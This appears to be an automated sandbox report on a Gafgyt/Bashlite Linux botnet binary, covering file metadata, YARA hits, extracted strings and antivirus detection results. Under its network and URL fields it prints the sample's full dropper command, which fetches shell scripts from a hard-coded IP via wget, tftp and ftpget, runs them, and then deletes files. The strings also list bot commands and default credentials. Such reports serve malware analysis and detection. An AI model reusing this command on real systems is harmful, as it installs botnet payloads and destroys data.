Report #1706

Binary
ABI
ELFOSABI_SYSV
Size
72.75KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Community
Google
False
HashLib
False
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf

Suspicious
True

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/cpuinfo, /proc/net/route
Password

Suspicious
True
Flags
Flags
0
Packer
List
None
Packed
False
Network
IPs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://162.243.216.150/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 162.243.216.150 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 162.243.216.150; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 162.243.216.150 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit, 162.243.216.150:23
URLs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://162.243.216.150/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 162.243.216.150 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 162.243.216.150; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 162.243.216.150 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
Mails

Suspicious
True
Strings
List
162.243.216.150:23
.got.plt
Network is down
Machine is not on the network
No route to host
Host is down
been_there_done_that.2832
been_there_done_that
_fwrite.c
open.c
write.c
Transport endpoint is not connected
No such process
Block device required
No such device or address
Remote address changed
Operation now in progress
Too many open files
Too many open files in system
Connection reset by peer
No such device
Is a named type file
Link has been severed
Object is remote
Too many links
REPORT %s:%s:%s
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
Operation not permitted
My IP: %s
Invalid flag "%s"
8.8.8.8
BUILD %s
BUILD %s
Too many users
__GI_execl
__GI_fflush_unlocked
PONG!
__libc_nanosleep
__GI_sleep
__socketcall
__GI_execve
__register_frame_info_bases
__GI_pipe
_Jv_RegisterClasses
__deregister_frame_info_bases
fflush_unlocked.c
__GI_nanosleep
nanosleep.c
__socketcall.c
fflush_unlocked
socket.c
__GI_socket
sleep.c
sendHTTP
tcpcsum
PONG
HTTP
commServer
pipe.c
Software caused connection abort
Socket operation on non-socket
inet_addr
currentServer
Identifier removed
Interrupted system call should be restarted
Operation already in progress
Address family not supported by protocol
Too many references: cannot splice
makeIPPacket
usernames
Transport endpoint is already connected
KILLATTK
random_poly_info
random_r
random.c
changeme
Permission denied
nanosleep
srandom_r
__GI_random_r
password
sendTCP
Too many levels of symbolic links
Can not access a needed shared library
fwrite_unlocked
Not a XENIX named type file
processCmd
random_r.c
Exec format error
__GI_srandom_r
Protocol driver not attached
passwords
Attempting to link in too many shared libraries
getHost
Network dropped connection on reset
__GI_random
vfprintf
Name not unique on network

Symbols
Number
624
Reason
None
Suspicious
False
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False
Segments
Number
3
Suspicious
False
Compilers
List
GCC: (GNU) 4.1.2
Identified
133
Suspicious
True
Functions
Present
True
Anti-Debug
Ptrace
False
Anti-disasm
False
Entry Point
Address
0x8048164
Suspicious
False
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
56552
AVclass
gafgyt
1
VirusTotal
md5
89872aeff8396a2e86aab447c86f5394
sha1
22e7f59b7f8792f12bfc0b6ef75ca319bf432082
SCANS (DETECTION RATE = 64.81%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20190308
version: 18.4.3895.0
detected: True

CMC
update: 20190307
version: 1.1.0.977
detected: False

MAX
result: malware (ai score=98)
update: 20190308
version: 2018.9.12.1
detected: True

Bkav
update: 20190307
version: 1.3.0.9899
detected: False

K7GW
update: 20190308
version: 11.32.30218
detected: False

ALYac
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190308
version: 1.1.1.5
detected: True

Avast
result: ELF:DDoS-Y [Trj]
update: 20190308
version: 18.4.3895.0
detected: True

Avira
result: DDOS/LNX.Lightaidra.rddnf
update: 20190307
version: 8.3.3.8
detected: True

Baidu
update: 20190306
version: 1.0.0.2
detected: False

Cyren
update: 20190308
version: 6.2.0.1
detected: False

DrWeb
result: Linux.BackDoor.Fgt.373
update: 20190308
version: 7.0.34.11020
detected: True

GData
result: Linux.Trojan.Gafgyt.B
update: 20190308
version: A:25.20990B:25.14553
detected: True

Panda
update: 20190307
version: 4.6.4.2
detected: False

VBA32
update: 20190307
version: 4.0.0
detected: False

Zoner
update: 20190308
version: 1.0
detected: False

ClamAV
result: Unix.Trojan.Gafgyt-111
update: 20190307
version: 0.101.1.0
detected: True

Comodo
result: Malware@#13l2ynv6c346i
update: 20190308
version: 30536
detected: True

Ikarus
result: Trojan.Linux.Gafgyt
update: 20190307
version: 0.1.5.2
detected: True

McAfee
result: Linux/Gafgyt.a
update: 20190308
version: 6.0.6.653
detected: True

Rising
result: Backdoor.Gafgyt/Linux!1.A512 (CLASSIC)
update: 20190308
version: 25.0.0.24
detected: True

Sophos
result: Linux/DDoS-BI
update: 20190308
version: 4.98.0
detected: True

Yandex
update: 20190306
version: 5.5.1.3
detected: False

Arcabit
result: Trojan.Backdoor.Linux.Gafgyt.1
update: 20190308
version: 1.0.0.837
detected: True

Babable
update: 20180918
version: 9107201
detected: False

TACHYON
update: 20190308
version: 2019-03-08.01
detected: False

Tencent
result: backdoor.linux.gafgyt.z
update: 20190308
version: 1.0.0.1
detected: True

ViRobot
update: 20190308
version: 2014.3.20.0
detected: False

Ad-Aware
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190308
version: 3.0.5.370
detected: True

AegisLab
update: 20190308
version: 4.2
detected: False

Emsisoft
result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B)
update: 20190308
version: 2018.4.0.1029
detected: True

F-Secure
result: Malware.DDOS/LNX.Lightaidra.rddnf
update: 20190308
version: 12.0.86.52
detected: True

Fortinet
result: ELF/Gafgyt.BJ!tr
update: 20190308
version: 5.4.247.0
detected: True

Jiangmin
result: Backdoor.Linux.gbf
update: 20190308
version: 16.0.100
detected: True

Kingsoft
update: 20190308
version: 2013.8.14.323
detected: False

AhnLab-V3
result: Linux/Gafgyt.Gen
update: 20190308
version: 3.14.1.22785
detected: True

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.f
update: 20190308
version: 3.0.0.1
detected: True

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.ac
update: 20190308
version: 15.0.1.13
detected: True

Microsoft
result: DDoS:Linux/Lightaidra
update: 20190307
version: 1.1.15700.9
detected: True

Qihoo-360
result: Win32/Backdoor.263
update: 20190308
version: 1.0.0.1120
detected: True

TheHacker
update: 20190304
version: 6.8.0.5.4035
detected: False

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.ac
update: 20190308
version: 1.0
detected: True

ESET-NOD32
result: a variant of Linux/Gafgyt.C
update: 20190308
version: 18992
detected: True

BitDefender
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190308
version: 7.2
detected: True

K7AntiVirus
update: 20190308
version: 11.32.30218
detected: False

SentinelOne
result: static engine - malicious
update: 20190203
version: 1.0.23.276
detected: True

Avast-Mobile
result: ELF:DDoS-S [Trj]
update: 20190307
version: 190307-04
detected: True

Malwarebytes
update: 20190308
version: 2.1.1.1115
detected: False

TotalDefense
update: 20190307
version: 37.1.62.1
detected: False

CAT-QuickHeal
result: Exploit.Linux.Shellshock.A
update: 20190306
version: 14.00
detected: True

NANO-Antivirus
result: Trojan.Elf32.Gafgyt.eikqfj
update: 20190308
version: 1.0.134.24576
detected: True

MicroWorld-eScan
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190308
version: 14.0.297.0
detected: True

SUPERAntiSpyware
update: 20190307
version: 5.6.0.1032
detected: False

McAfee-GW-Edition
result: Linux/Gafgyt.a
update: 20190308
version: v2017.3010
detected: True

TrendMicro-HouseCall
result: ELF_BASHLITE.SMC
update: 20190308
version: 10.0.0.1040
detected: True

total
54
sha256
27f248d86f9942081878a3c87d2b8888c0ec6811ca4b89a58b6a5f2d844e8853
scan_id
27f248d86f9942081878a3c87d2b8888c0ec6811ca4b89a58b6a5f2d844e8853-1552027301
resource
89872aeff8396a2e86aab447c86f5394
positives
35
scan_date
2019-03-08 06:41:41
verbose_msg
Scan finished, information embedded
response_code
1
Binary
RF
confidence: 100.00%
suspicious: True
MLP
confidence: 99.98%
suspicious: True
SVM
confidence: 98.80%
suspicious: True